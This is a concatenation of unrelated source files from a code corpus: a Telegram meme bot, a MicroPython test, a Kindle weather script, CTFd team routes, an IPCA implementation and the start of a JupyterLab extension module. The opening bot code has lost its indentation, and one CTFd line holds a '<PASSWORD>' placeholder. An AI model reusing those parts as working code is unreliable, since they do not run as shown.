async def lower(message, text):
await message.reply(text.lower())
@dp.message_handler(commands=["markdown"])
@handlers.get_text
async def markdown(message, text):
await message.reply(text, parse_mode="Markdown")
```
#### File: bot/lib/convert_bytes.py
```python
def convert_bytes(num):
for x in ['bytes', 'KB', 'MB', 'GB', 'TB']:
if num < 1024.0:
return f"{round(num, 2)} {x}"
num /= 1024.0
```
#### File: bot/lib/libtree.py
```python
from aiogram.utils import json
# символы
TAB = " "
MIDDLE_ITEM = "├"
END_ITEM = "└"
NO_ITEM = "│"
ITEM = "─"
def iter_last(iterable):
iterable = iter(iterable)
try:
p = next(iterable)
except StopIteration:
return False
for i in iterable:
yield p, False
p = i
yield p, True
def make_tree(d, title="root", default_line="") -> str:
lines = list()
lines.append(title)
if isinstance(d, list):
d = {str(i): val for i, val in enumerate(d)}
for (key, val), end in iter_last(d.items()):
if end:
before_item = END_ITEM
else:
before_item = MIDDLE_ITEM
line = default_line
line += f"{before_item}{ITEM}"
if isinstance(val, dict) or isinstance(val, list):
dline = default_line
dline += (NO_ITEM if not end else " ") + " "
val = make_tree(val, title=key, default_line=dline)
line += val
else:
line += f"{key}: {val}"
lines.append(line)
return "\n".join(lines)
```
#### File: bot/memes/memes.py
```python
from ..config import bot, dp, _
async def send_meme(message, text):
try:
await message.delete()
except Exception:
pass
try:
await bot.send_message(
message.chat.id, text,
reply_to_message_id=message.reply_to_message.message_id
)
except AttributeError:
await message.answer(text)
memes = {
"bylo": "Было",
"ne_bylo": "Не было",
"rzaka": _("ban.rzaka"),
"rzaka_full": _("ban.rzaka_full"),
"rzaka_time": 848393938347292929647492918363739304964682010
}
@dp.message_handler(commands=["bylo"])
async def bylo(message):
await send_meme(message, memes["bylo"])
@dp.message_handler(commands=["ne_bylo"])
async def ne_bylo(message):
await send_meme(message, memes["ne_bylo"])
@dp.message_handler(commands=["rzaka"])
async def rzaka(message):
await send_meme(message, memes["rzaka"])
@dp.message_handler(commands=["rzaka_full"])
async def rzaka_full(message):
await send_meme(message, memes["rzaka_full"])
@dp.message_handler(commands=["rzaka_time"])
async def rzaka_time(message):
await send_meme(message, memes["rzaka_time"])
@dp.message_handler(commands=["ban"])
async def ban(message):
msg = message.text.split(maxsplit=1)
if len(msg) == 1:
await send_meme(message, "Бан")
else:
await send_meme(message, "Бан " + msg[1])
@dp.message_handler(commands=["fake"])
async def polak(message):
try:
await message.delete()
except Exception:
pass
try:
await bot.send_photo(
message.chat.id, open("media/images/polak.jpg", "rb"),
reply_to_message_id=message.reply_to_message.message_id
)
except AttributeError:
await message.answer_photo(open("media/images/polak.jpg", "rb"))
```
#### File: bot/network/memepedia.py
```python
import pymemeru
from ..config import dp, _
from ..lib import handlers
from ..lib.text import cuteCrop
@dp.message_handler(commands=["memepedia", "meme"])
@handlers.parse_arguments(2)
async def mempep(message, params):
try:
search = await pymemeru.search(params[1])
except AttributeError:
await message.reply(_("errors.not_found"))
return
page = await pymemeru.page(search[0]["name"])
if page[0] == "":
await message.reply(cuteCrop(page[1], 4096), parse_mode="HTML")
else:
await message.reply_photo(page[0],
caption=cuteCrop(page[1], 1000),
parse_mode="HTML")
```
#### File: 0x0bloodyknight/jdan734-bot/bot.py
```python
import asyncio
import aioschedule
from aiogram import executor
from bot import * # noqa
from bot.config import (
dp, polls, DELAY, RSS, VK, SCHEDULE,
KATZ_BOTS, RSS_FEEDS, YOUTUBE, YOUTUBE_CHANNELS)
from bot.timer import rss_task, youtube_task
from bot.vk import vk_timer
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
async def scheduler():
if RSS:
for feed in RSS_FEEDS:
aioschedule.every(DELAY).seconds.do(
rss_task,
feed["url"],
feed["channelid"],
feed["chatid"]
)
if YOUTUBE:
for channel in YOUTUBE_CHANNELS:
aioschedule.every(15).minutes.do(
youtube_task,
channel["channelid"],
channel["chatid"]
)
if VK:
aioschedule.every(DELAY).seconds.do(vk_timer)
if KATZ_BOTS:
aioschedule.every(DELAY).seconds.do(polls.close_old)
while True:
await aioschedule.run_pending()
await asyncio.sleep(5)
async def startup(x):
if SCHEDULE:
asyncio.create_task(scheduler())
executor.start_polling(dp, loop=loop, on_startup=startup)
``` |
{
"source": "0x0ece/micropython",
"score": 4
} |
#### File: tests/basics/lexer.py
```python
print(type(__debug__))
# short input
exec("")
exec("\n")
exec("\n\n")
exec("\r")
exec("\r\r")
print(eval("1"))
print(eval("12"))
print(eval("123"))
print(eval("1\n"))
print(eval("12\n"))
print(eval("123\n"))
print(eval("1\r"))
print(eval("12\r"))
print(eval("123\r"))
# lots of indentation
def a(x):
if x:
if x:
if x:
if x:
if x:
if x:
if x:
if x:
if x:
if x:
if x:
if x:
if x:
if x:
if x:
print(x)
a(1)
``` |
{
"source": "0x0Eddine/kindle4weather",
"score": 3
} |
#### File: 0x0Eddine/kindle4weather/weather_api.py
```python
import datetime
import json
from urllib2 import urlopen
def _fetch_json(url):
json_str = urlopen(url).read()
return json.loads(json_str)
def _parse_forecast(data_json):
"""
return [WeatherData]
"""
tmp_list = []
for data in data_json["forecast"]["simpleforecast"]["forecastday"]:
tmp_list.append(WeatherData(data["icon"], data["high"]["celsius"],
data["low"]["celsius"]))
return tmp_list
class WeatherData(object):
def __init__(self, condition, temp_max, temp_min):
self.condition = condition
self.temp_max = temp_max
self.temp_min = temp_min
class WeatherAPI(object):
_BASE_API_URL = "http://api.wunderground.com/api/"
def __init__(self, api_key, lat, lon):
url_api_key = "appid=%s" % api_key
url_location = "lat=%s&lon=%s" % (lat, lon)
forecast_json = _fetch_json(
"%s/%s/forecast/q/%s,%s.json" %
(WeatherAPI._BASE_API_URL, api_key, lat, lon))
self._data = _parse_forecast(forecast_json)
self._today = datetime.date.today()
def temp_max(self, day):
"""
Input day as integer, 0 means today, 1 means tomorrow, max is 3.
"""
if day > 3:
raise Exception("Invalid day, should less or equal to 3")
return self._data[day].temp_max
def temp_min(self, day):
if day > 3:
raise Exception("Invalid day, should less or equal to 3")
return self._data[day].temp_min
def condition(self, day):
if day > 3:
raise Exception("Invalid day, should less or equal to 3")
return self._data[day].condition
@property
def today(self):
"""
Return a object of datetime.date
"""
return self._today
```
#### File: 0x0Eddine/kindle4weather/weather_script.py
```python
import codecs
import datetime
import os
import sys
from weather_api import WeatherAPI
from argparse import ArgumentParser
from aqi import aqi_get
CODE_FOLDER = os.path.dirname(os.path.realpath(__file__))
OUTPUT = "/var/www/html/weather/weather.png"
TMP_OUTPUT = "%s/weather.png" % CODE_FOLDER
SVG_PORTRAIT_FILE = "%s/weather-script-preprocess.svg" % CODE_FOLDER
SVG_LANSCAPE_FILE = "%s/weather-script-preprocess-landscape.svg" % CODE_FOLDER
SVG_FILE = SVG_PORTRAIT_FILE
SVG_OUTPUT = "%s/weather-script-output.svg" % CODE_FOLDER
MAX_WEATHER_DAY_COUNT = 3
AQI_CITY = None
def _exec(cmd):
rc = os.system(cmd)
if (rc != 0):
print("`%s` failed with error %d" % (cmd, rc))
exit(rc)
if len(sys.argv) < 4:
print("Need 3 or more argument for API key, latitude, longitud, "
"[is_landscape] [aqi_city_name_for_landscape]")
exit(1)
weather_obj = WeatherAPI(sys.argv[1], sys.argv[2], sys.argv[3])
if len(sys.argv) >= 5 and sys.argv[4] != 0:
SVG_FILE = SVG_LANSCAPE_FILE
if len(sys.argv) >= 6 and sys.argv[5]:
AQI_CITY = sys.argv[5]
# Open SVG to process
output = codecs.open(SVG_FILE, "r", encoding="utf-8").read()
_MAP = {
"$I": WeatherAPI.condition,
"$H": WeatherAPI.temp_max,
"$L": WeatherAPI.temp_min,
}
for x in _MAP.keys():
for i in range(MAX_WEATHER_DAY_COUNT + 1):
output = output.replace("%s%d" % (x, i),
"%s" % _MAP[x](weather_obj, i))
# Replace refresh time
output = output.replace("$TIME",
datetime.datetime.now().strftime("%b %d %a %H:%M"))
# Updaet AQI. TODO(Gris Ge): still place holder yet.
if AQI_CITY is not None:
output = output.replace("$AQI", str(aqi_get(AQI_CITY)))
day_one = weather_obj.today
# Insert days of week
one_day = datetime.timedelta(days=1)
days_of_week = ["Mon", "Tue", "Wed", "Thu", "Fri", "Sat", "Sun"]
for i in range(MAX_WEATHER_DAY_COUNT + 1):
output = output.replace("$D%s" % i,
days_of_week[(day_one + i * one_day).weekday()])
# Write output
codecs.open(SVG_OUTPUT, "w", encoding="utf-8").write(output)
_exec("rsvg-convert --background-color=white -o %s %s" %
(TMP_OUTPUT, SVG_OUTPUT))
_exec("pngcrush -c 0 -ow %s 1>/dev/null 2>&1" % TMP_OUTPUT)
#_exec("mv -f '%s' '%s'" % (TMP_OUTPUT, OUTPUT))
``` |
{
"source": "0x0elliot/CTFd",
"score": 2
} |
#### File: CTFd/CTFd/teams.py
```python
from flask import Blueprint, abort, redirect, render_template, request, url_for
from CTFd.cache import clear_team_session, clear_user_session
from CTFd.exceptions import TeamTokenExpiredException, TeamTokenInvalidException
from CTFd.models import TeamFieldEntries, TeamFields, Teams, db
from CTFd.utils import config, get_config, validators
from CTFd.utils.crypto import verify_password
from CTFd.utils.decorators import authed_only, ratelimit, registered_only
from CTFd.utils.decorators.modes import require_team_mode
from CTFd.utils.decorators.visibility import (
check_account_visibility,
check_score_visibility,
)
from CTFd.utils.helpers import get_errors, get_infos
from CTFd.utils.humanize.words import pluralize
from CTFd.utils.user import get_current_user, get_current_user_attrs
teams = Blueprint("teams", __name__)
@teams.route("/teams")
@check_account_visibility
@require_team_mode
def listing():
q = request.args.get("q")
field = request.args.get("field", "name")
filters = []
if field not in ("name", "affiliation", "website"):
field = "name"
if q:
filters.append(getattr(Teams, field).like("%{}%".format(q)))
teams = (
Teams.query.filter_by(hidden=False, banned=False)
.filter(*filters)
.order_by(Teams.id.asc())
.paginate(per_page=50)
)
args = dict(request.args)
args.pop("page", 1)
return render_template(
"teams/teams.html",
teams=teams,
prev_page=url_for(request.endpoint, page=teams.prev_num, **args),
next_page=url_for(request.endpoint, page=teams.next_num, **args),
q=q,
field=field,
)
@teams.route("/teams/invite", methods=["GET", "POST"])
@registered_only
@require_team_mode
def invite():
infos = get_infos()
errors = get_errors()
code = request.args.get("code")
if code is None:
abort(404)
user = get_current_user_attrs()
if user.team_id:
errors.append("You are already in a team. You cannot join another.")
try:
team = Teams.load_invite_code(code)
except TeamTokenExpiredException:
abort(403, description="This invite URL has expired")
except TeamTokenInvalidException:
abort(403, description="This invite URL is invalid")
team_size_limit = get_config("team_size", default=0)
if request.method == "GET":
if team_size_limit:
infos.append(
"Teams are limited to {limit} member{plural}".format(
limit=team_size_limit, plural=pluralize(number=team_size_limit)
)
)
return render_template(
"teams/invite.html", team=team, infos=infos, errors=errors
)
if request.method == "POST":
if errors:
return (
render_template(
"teams/invite.html", team=team, infos=infos, errors=errors
),
403,
)
if team_size_limit and len(team.members) >= team_size_limit:
errors.append(
"{name} has already reached the team size limit of {limit}".format(
name=team.name, limit=team_size_limit
)
)
return (
render_template(
"teams/invite.html", team=team, infos=infos, errors=errors
),
403,
)
user = get_current_user()
user.team_id = team.id
db.session.commit()
clear_user_session(user_id=user.id)
clear_team_session(team_id=team.id)
return redirect(url_for("challenges.listing"))
@teams.route("/teams/join", methods=["GET", "POST"])
@authed_only
@require_team_mode
@ratelimit(method="POST", limit=10, interval=5)
def join():
infos = get_infos()
errors = get_errors()
user = get_current_user_attrs()
if user.team_id:
errors.append("You are already in a team. You cannot join another.")
if request.method == "GET":
team_size_limit = get_config("team_size", default=0)
if team_size_limit:
plural = "" if team_size_limit == 1 else "s"
infos.append(
"Teams are limited to {limit} member{plural}".format(
limit=team_size_limit, plural=plural
)
)
return render_template("teams/join_team.html", infos=infos, errors=errors)
if request.method == "POST":
teamname = request.form.get("name")
passphrase = request.form.get("password", "").strip()
team = Teams.query.filter_by(name=teamname).first()
if errors:
return (
render_template("teams/join_team.html", infos=infos, errors=errors),
403,
)
if team and verify_password(passphrase, team.password):
team_size_limit = get_config("team_size", default=0)
if team_size_limit and len(team.members) >= team_size_limit:
errors.append(
"{name} has already reached the team size limit of {limit}".format(
name=team.name, limit=team_size_limit
)
)
return render_template(
"teams/join_team.html", infos=infos, errors=errors
)
user = get_current_user()
user.team_id = team.id
db.session.commit()
if len(team.members) == 1:
team.captain_id = user.id
db.session.commit()
clear_user_session(user_id=user.id)
clear_team_session(team_id=team.id)
return redirect(url_for("challenges.listing"))
else:
errors.append("That information is incorrect")
return render_template("teams/join_team.html", infos=infos, errors=errors)
@teams.route("/teams/new", methods=["GET", "POST"])
@authed_only
@require_team_mode
def new():
infos = get_infos()
errors = get_errors()
if bool(get_config("team_creation", default=True)) is False:
abort(
403,
description="Team creation is currently disabled. Please join an existing team.",
)
num_teams_limit = int(get_config("num_teams", default=0))
num_teams = Teams.query.filter_by(banned=False, hidden=False).count()
if num_teams_limit and num_teams >= num_teams_limit:
abort(
403,
description=f"Reached the maximum number of teams ({num_teams_limit}). Please join an existing team.",
)
user = get_current_user_attrs()
if user.team_id:
errors.append("You are already in a team. You cannot join another.")
if request.method == "GET":
team_size_limit = get_config("team_size", default=0)
if team_size_limit:
plural = "" if team_size_limit == 1 else "s"
infos.append(
"Teams are limited to {limit} member{plural}".format(
limit=team_size_limit, plural=plural
)
)
return render_template("teams/new_team.html", infos=infos, errors=errors)
elif request.method == "POST":
teamname = request.form.get("name", "").strip()
passphrase = request.form.get("password", "").strip()
website = request.form.get("website")
affiliation = request.form.get("affiliation")
user = get_current_user()
existing_team = Teams.query.filter_by(name=teamname).first()
if existing_team:
errors.append("That team name is already taken")
if not teamname:
errors.append("That team name is invalid")
# Process additional user fields
fields = {}
for field in TeamFields.query.all():
fields[field.id] = field
entries = {}
for field_id, field in fields.items():
value = request.form.get(f"fields[{field_id}]", "").strip()
if field.required is True and (value is None or value == ""):
errors.append("Please provide all required fields")
break
# Handle special casing of existing profile fields
if field.name.lower() == "affiliation":
affiliation = value
break
elif field.name.lower() == "website":
website = value
break
if field.field_type == "boolean":
entries[field_id] = bool(value)
else:
entries[field_id] = value
if website:
valid_website = validators.validate_url(website)
else:
valid_website = True
if affiliation:
valid_affiliation = len(affiliation) < 128
else:
valid_affiliation = True
if valid_website is False:
errors.append("Websites must be a proper URL starting with http or https")
if valid_affiliation is False:
errors.append("Please provide a shorter affiliation")
if errors:
return render_template("teams/new_team.html", errors=errors), 403
team = Teams(name=teamname, password=<PASSWORD>, captain_id=user.id)
if website:
team.website = website
if affiliation:
team.affiliation = affiliation
db.session.add(team)
db.session.commit()
for field_id, value in entries.items():
entry = TeamFieldEntries(field_id=field_id, value=value, team_id=team.id)
db.session.add(entry)
db.session.commit()
user.team_id = team.id
db.session.commit()
clear_user_session(user_id=user.id)
clear_team_session(team_id=team.id)
return redirect(url_for("challenges.listing"))
@teams.route("/team")
@authed_only
@require_team_mode
def private():
infos = get_infos()
errors = get_errors()
user = get_current_user()
if not user.team_id:
return render_template("teams/team_enrollment.html")
team_id = user.team_id
team = Teams.query.filter_by(id=team_id).first_or_404()
solves = team.get_solves()
awards = team.get_awards()
place = team.place
score = team.score
if config.is_scoreboard_frozen():
infos.append("Scoreboard has been frozen")
class teams_template_info():
def __init__(self, solves, awards, user, team, score, place, infos, errors):
self.solves = solves
self.awards = awards
self.user = user
self.team = team
self.score = score
self.place = place
self.score_frozen = config.is_scoreboard_frozen()
self.infos = infos
self.errors = errors
information = teams_template_info(solves, awards, user, team, score, place, infos, errors)
return render_template(
"teams/private.html",
information = information
)
@teams.route("/teams/<int:team_id>")
@check_account_visibility
@check_score_visibility
@require_team_mode
def public(team_id):
infos = get_infos()
errors = get_errors()
team = Teams.query.filter_by(id=team_id, banned=False, hidden=False).first_or_404()
solves = team.get_solves()
awards = team.get_awards()
place = team.place
score = team.score
if errors:
return render_template("teams/public.html", team=team, errors=errors)
if config.is_scoreboard_frozen():
infos.append("Scoreboard has been frozen")
return render_template(
"teams/public.html",
solves=solves,
awards=awards,
team=team,
score=score,
place=place,
score_frozen=config.is_scoreboard_frozen(),
infos=infos,
errors=errors,
)
``` |
{
"source": "0x0elliot/prep-project-4.1.2",
"score": 3
} |
#### File: server/db/crud.py
```python
from sqlalchemy.orm import Session
from sqlalchemy.sql.expression import desc
from . import models
import schemas
from db.database import SessionLocal
# Dependency
def get_db():
db = SessionLocal()
try:
yield db
finally:
db.close()
def get_user(db: Session, user_id: int):
return db.query(models.User).filter(models.User.id == user_id).first()
def get_user_by_email(db: Session, email: str):
return db.query(models.User).filter(models.User.email == email).first()
def get_users(db: Session, skip: int = 0, limit: int = 100):
return db.query(models.User).offset(skip).limit(limit).all()
def create_user(db: Session, user: schemas.User):
db_user = models.User(email=user.email, name=user.name)
db.add(db_user)
db.commit()
db.refresh(db_user)
return db_user
def test_populate_db(db: Session, user: schemas.User):
create_user(db, user)
def get_place_by_id(db: Session, place_id: int):
return db.query(models.Place).filter(models.Place.id == place_id).first()
def get_places_by_tag(db: Session, tag_name: str):
ans = db.query(models.Place).join(models.Place.tags).filter(
models.Tag.name == tag_name).order_by(desc(models.Place.vote_count)).limit(10).all()
return ans
def create_vote(db: Session, user: models.User, place: models.Place):
vote = models.Vote()
vote.user = user
place.votes.append(vote)
place.vote_count += 1
db.add(vote)
db.commit()
db.refresh(vote)
return vote
def create_comment(db: Session, user: models.User, place: models.Place, body: str):
comment = models.Comment(body=body)
comment.user = user
place.comments.append(comment)
db.add(comment)
db.commit()
db.refresh(comment)
return comment
def create_webhook(db: Session, user: models.User, webhook: schemas.WebhookCreate):
db_webhook = models.Webhook(trigger_name=webhook.trigger_name,
url=webhook.url,
type=webhook.type,
place='POINT({x} {y})'.format(x=webhook.locationX, y=webhook.locationY))
db_webhook.user = user
user.webhooks.append(db_webhook)
db.add(db_webhook)
db.commit()
db.refresh(db_webhook)
return db_webhook
def get_webhooks(user: models.User):
return user.webhooks
```
#### File: server/routers/comments.py
```python
from fastapi import APIRouter, Depends, HTTPException
from db.crud import get_db
import schemas
from sqlalchemy.orm import Session
from db import crud, models
from verify import get_current_user
router = APIRouter()
@router.post('/', response_model=schemas.Comment)
async def email_subscribe(comment: schemas.CommentBase, db: Session = Depends(get_db), user: models.User = Depends(get_current_user)):
place = crud.get_place_by_id(db, comment.place_id)
if place is None:
raise HTTPException(status_code=404, detail="Place invalid")
return crud.create_comment(db, user, place, comment.body)
``` |
{
"source": "0x0ffff/Maverick",
"score": 2
} |
#### File: Maverick/Maverick/Renderer.py
```python
import os
from jinja2 import Environment, PackageLoader
import moment
import re
import json
from feedgen.feed import FeedGenerator
from .Router import Router
from .Utils import safe_write, unify_joinpath, tr
from .Markdown import Markdown
class Renderer:
def __init__(self, config):
self._config = config
template = ".".join(["Templates", self._config.template])
self._env = Environment(loader=PackageLoader(template))
self._env.globals['moment'] = moment
self._env.globals['config'] = self._config
self._env.globals['Router'] = Router(self._config)
self._env.globals['tr'] = tr
from importlib import import_module
self._theme = import_module(template)
for k, v in self._theme .theme_globals.items():
self._env.globals[k] = v
@staticmethod
def markdown(content):
return Markdown(content)
@staticmethod
def excerpt(content):
def strip(text):
r = re.compile(r'<[^>]+>', re.S)
return r.sub('', text)
excerpt = content.get_meta("excerpt")
if excerpt != "":
return excerpt
# find <!--more-->
index = content.parsed.find('<!--more-->')
if index != -1:
excerpt = strip(content.parsed[:index])
else:
excerpt = strip(content.parsed)
excerpt = excerpt[:excerpt.find('\n')]
return excerpt
def update_env(self, env: dict):
for k, v in env.items():
self._env.globals[k] = v
def render_post(self, content, prev=None, next=None):
template = self._env.get_template("post.html")
return template.render(
content=content,
content_prev=prev,
content_next=next
)
def render_page(self, content, prev=None, next=None):
template = self._env.get_template("page.html")
return template.render(
content=content,
content_prev=prev,
content_next=next
)
def render_index(self, content_list, current_page, max_pages):
template = self._env.get_template("index.html")
return template.render(
content_list=content_list,
current_page=current_page,
max_pages=max_pages)
def render_tags(self, content_list, current_page, max_pages, tag_name=""):
template = self._env.get_template("tags.html")
return template.render(
tag_name=tag_name,
content_list=content_list,
current_page=current_page,
max_pages=max_pages)
def render_categories(self, content_list, current_page, max_pages, cate_name=""):
template = self._env.get_template("categories.html")
return template.render(
cate_name=cate_name,
content_list=content_list,
current_page=current_page,
max_pages=max_pages)
def render_archives(self, content_list, current_page, max_pages):
template = self._env.get_template("archives.html")
return template.render(
content_list=content_list,
current_page=current_page,
max_pages=max_pages)
def render_sitemap(self, page_list, post_list):
template = self._env.get_template("sitemap.xml")
sitemap = template.render(page_list=page_list,
post_list=post_list)
safe_write(
unify_joinpath(self._config.build_dir, 'sitemap.xml'), sitemap)
def render_rss(self, post_list):
router = Router(self._config)
fg = FeedGenerator()
fg.id(self._config.site_prefix)
fg.title(self._config.site_name)
fg.author({
'name': self._config.author,
'email': self._config.email
})
fg.link(href=self._config.site_prefix, rel='alternate')
fg.logo(self._config.site_logo)
fg.subtitle(self._config.description)
fg.language(self._config.language)
fg.lastBuildDate(moment.now().locale(self._config.locale).date)
fg.pubDate(moment.now().locale(self._config.locale).date)
for post in post_list[:10]:
meta = post.meta
fe = fg.add_entry()
fe.title(meta['title'])
fe.link(href=router.gen_permalink_by_meta(meta))
fe.guid(router.gen_permalink_by_meta(meta), True)
fe.pubDate(meta['date'].date)
fe.author({
'name': meta['author'],
'uri': self._config.author_homepage,
'email': self._config.email
})
fe.content(post.parsed)
if not os.path.exists(unify_joinpath(self._config.build_dir, 'feed/atom')):
os.makedirs(unify_joinpath(self._config.build_dir, 'feed/atom'))
fg.rss_file(unify_joinpath(self._config.build_dir, 'feed/index.xml'))
fg.rss_file(unify_joinpath(self._config.build_dir, 'feed/index.html'))
fg.atom_file(unify_joinpath(
self._config.build_dir, 'feed/atom/index.xml'))
fg.atom_file(unify_joinpath(
self._config.build_dir, 'feed/atom/index.html'))
def render_search_cache(self, post_list, page_list):
router = Router(self._config)
def strip(text):
r = re.compile(r'<[^>]+>', re.S)
return r.sub('', text)
def gen_entry(content):
entry = {
"title": content.get_meta('title'),
"date": str(content.get_meta('date')),
"path": router.gen_permalink_by_content(content),
"text": strip(content.parsed),
"categories": [],
"tags": []
}
if (content.get_meta('layout') == 'post'):
for cate in content.get_meta('categories'):
entry['categories'].append({
"name": cate,
"slug": cate,
"permalink": router.gen_permalink('category', cate, 1)
})
for tag in content.get_meta('tags'):
entry['tags'].append({
"name": tag,
"slug": tag,
"permalink": router.gen_permalink('tag', tag, 1)
})
return entry
posts = [gen_entry(post) for post in post_list if not post.skip]
pages = [gen_entry(page) for page in page_list if not page.skip]
cache = json.dumps({
"posts": posts,
"pages": pages
})
return cache
``` |
{
"source": "0x0is1/cardet",
"score": 3
} |
#### File: 0x0is1/cardet/main.py
```python
from libcardet import libcardet as lcd
def main():
vehicle_num = input(f"{lcd.tmcolors.OKCYAN}[*] Enter vehicle number to get details: {lcd.tmcolors.ENDC}")
data = lcd.get_details(vehicle_num)
for i in list(data):
print(f"{lcd.tmcolors.OKGREEN}[+] {i}: {data[i]}{lcd.tmcolors.ENDC}")
if __name__ == '__main__':
main()
``` |
{
"source": "0x0L/fastipca",
"score": 2
} |
#### File: src/fastipca/fastipca.py
```python
import logging
import numpy as np
import opt_einsum as oe
import pandas as pd
from scipy.sparse.linalg import svds
logging.basicConfig(
format="%(levelname)s: %(name)s - %(asctime)s.%(msecs)03d %(message)s",
datefmt="%H:%M:%S",
level=logging.INFO,
)
_logger = logging.getLogger(__name__)
def train(
Z,
R,
n_factors=1,
exog_factors=None,
intercept=False,
max_iter=1000,
tol=1e-6,
verbose=False,
):
"""Implements the IPCA algorithm by <NAME> (2017).
Parameters
----------
Z : pandas.DataFrame
Panel of characteristics. Columns are individual characteristics.
Index must be a multi-index with time as the first component
and symbols as the second component.
The time component must be sorted.
R : pandas.Series
Panel of returns to be explained. Index must agrees with Z index.
n_factors : integer
number of factors to calibrate possibly 0.
exog_factors : pandas.DataFrame
Matrix of pre-specified factors. Index must coincide with the first
level of Z index..
intercept: bool
If true, a constant pre-specified factor equals to one is appended.
max_iter: integer
Maximum number of iterations to perform.
tol : float
MAE tolerance between iterations.
verbose : bool
If True, displays convergence info each iteration.
Returns
-------
gamma : pandas.DataFrame
Characteristics loadings.
factors : pandas.DataFrame
Factor estimates.
Note
----
The factor must be positive.
"""
if verbose:
_logger.setLevel(logging.INFO)
else:
_logger.setLevel(logging.WARN)
assert n_factors >= 0
assert max_iter >= 0
assert Z.index.equals(R.index)
assert Z.index.get_level_values(0).is_monotonic_increasing
_logger.info("compute interactions and covariances")
ix = Z.index.remove_unused_levels()
r = 1 + np.nonzero(np.diff(ix.codes[0]))[0]
r = np.array([0, *r.tolist(), ix.shape[0]])
nobs = r[1:] - r[:-1]
z = Z.values
zr = z * R.values[:, None]
Q = np.stack([zr[i:j].mean(0) for i, j in zip(r, r[1:])])
W = np.stack([z[i:j].T @ z[i:j] / (j - i) for i, j in zip(r, r[1:])])
_logger.info("initialize gamma, factors")
if exog_factors is None:
exog_factors_names = []
exog_factors = np.empty((ix.levels[0].shape[0], 0))
else:
assert exog_factors.index.equals(ix.levels[0])
exog_factors_names = exog_factors.columns.tolist()
exog_factors = exog_factors.values
factor_names = list(range(n_factors)) + exog_factors_names
if intercept:
factor_names.append("intercept")
n_all = len(factor_names)
active = slice(0, n_factors)
specified = slice(n_factors, n_all)
gamma = np.zeros((Z.shape[1], n_all))
factors = np.zeros((exog_factors.shape[0], n_all))
f_on, f_off = factors[:, active], factors[:, specified]
g_on, g_off = gamma[:, active], gamma[:, specified]
if intercept:
f_off[:, :-1] = exog_factors
f_off[:, -1] = 1.0
else:
f_off[:] = exog_factors
if n_factors > 0:
if n_factors == Z.shape[1]:
f, s, g = np.linalg.svd(Q, full_matrices=False)
else:
f, s, g = svds(Q, k=n_factors)
o = np.argsort(s)[::-1]
g_on[:] = g[o].T
f_on[:] = f[:, o] * s[o]
for ite in range(max_iter):
factors_old, gamma_old = f_on.copy(), gamma.copy()
# factors step
if n_factors > 0:
m1 = oe.contract("lk,tlm,mn->tkn", g_on, W, g_on)
m2 = Q @ g_on
if n_factors != n_all:
m2 -= oe.contract("lk,tlm,mn,tn->tk", g_on, W, g_off, f_off)
f_on[:] = np.linalg.solve(m1, m2)
# gamma step
numer = oe.contract("tl,tf,t->lf", Q, factors, nobs).reshape(-1)
denom = oe.contract("tij,tk,tl,t->ikjl", W, factors, factors, nobs)
denom = denom.reshape((gamma.size, gamma.size))
gamma[:] = np.linalg.solve(denom, numer).reshape(gamma.shape)
# identification
if n_factors > 0:
# make gamma and factors orthogonal
R1 = np.linalg.cholesky(g_on.T @ g_on)
R2, _, _ = np.linalg.svd(R1 @ f_on.T @ f_on @ R1.T)
f_on[:] = np.linalg.solve(R2, R1 @ f_on.T).T
g_on[:] = np.linalg.lstsq(g_on.T, R1.T, rcond=None)[0] @ R2
# make g_off and g_on orthogonal
if n_factors != n_all:
g_off[:] -= g_on @ g_on.T @ g_off
f_on[:] += f_off @ g_off.T @ g_on
# factors should have a positive mean
sgn = np.sign(f_on.mean(0))
sgn[sgn == 0] = 1
f_on[:] *= sgn
g_on[:] *= sgn
# exit condition
tol_f, tol_g = -np.inf, -np.inf
if n_all > 0:
tol_g = np.abs(gamma - gamma_old).max()
if n_factors > 0:
tol_f = np.abs(f_on - factors_old).max()
_logger.info(f"iter={ite} tol_g={tol_g:.4} tol_f={tol_f:.4}")
if max(tol_g, tol_f) < tol:
break
else:
_logger.warning("ipca did not converge")
gamma = pd.DataFrame(gamma, index=Z.columns, columns=factor_names)
factors = pd.DataFrame(factors, index=ix.levels[0], columns=factor_names)
return gamma, factors
def predict(Z, gamma, factors):
"""Implements the IPCA algorithm by <NAME> (2017).
Parameters
----------
Z : pandas.DataFrame
Panel of characteristics. Columns are individual characteristics.
Index must be a multi-index with time as the first component
and symbols as the second component.
The time component must be sorted.
gamma : pandas.DataFrame
Characteristics loadings.
factors : pandas.DataFrame
Factor estimates.
Returns
-------
pandas.Series
Reconstructed values.
"""
rhat = Z.values @ gamma.values
if factors.ndim == 1:
rhat *= factors.values
else:
assert Z.index.levels[0].equals(factors.index)
rhat *= factors.values[Z.index.codes[0]]
rhat = rhat.sum(1)
return pd.Series(rhat, index=Z.index)
``` |
{
"source": "0x0L/jupyterlab",
"score": 2
} |
#### File: jupyterlab/jupyterlab/labextensions.py
```python
from __future__ import print_function
import os
import shutil
import sys
import tarfile
from os.path import join as pjoin, normpath
from jupyter_core.paths import (
jupyter_data_dir, jupyter_config_dir, jupyter_config_path,
SYSTEM_JUPYTER_PATH, ENV_JUPYTER_PATH, ENV_CONFIG_PATH, SYSTEM_CONFIG_PATH
)
from ipython_genutils.path import ensure_dir_exists
from ipython_genutils.py3compat import string_types, cast_unicode_py2
from . import __version__
from traitlets.config.manager import BaseJSONConfigManager
from traitlets.utils.importstring import import_item
from tornado.log import LogFormatter
from . import (
get_labextension_manifest_data_by_folder,
)
# Constants for pretty print extension listing function.
# Window doesn't support coloring in the commandline
GREEN_ENABLED = '\033[32m enabled \033[0m' if os.name != 'nt' else 'enabled '
RED_DISABLED = '\033[31mdisabled\033[0m' if os.name != 'nt' else 'disabled'
GREEN_OK = '\033[32mOK\033[0m' if os.name != 'nt' else 'ok'
RED_X = '\033[31m X\033[0m' if os.name != 'nt' else ' X'
#------------------------------------------------------------------------------
# Public API
#------------------------------------------------------------------------------
class ArgumentConflict(ValueError):
pass
def check_labextension(files, user=False, prefix=None, labextensions_dir=None, sys_prefix=False):
"""Check whether labextension files have been installed
Returns True if all files are found, False if any are missing.
Parameters
----------
files : list(paths)
a list of relative paths within labextensions.
user : bool [default: False]
Whether to check the user's .jupyter/labextensions directory.
Otherwise check a system-wide install (e.g. /usr/local/share/jupyter/labextensions).
prefix : str [optional]
Specify install prefix, if it should differ from default (e.g. /usr/local).
Will check prefix/share/jupyter/labextensions
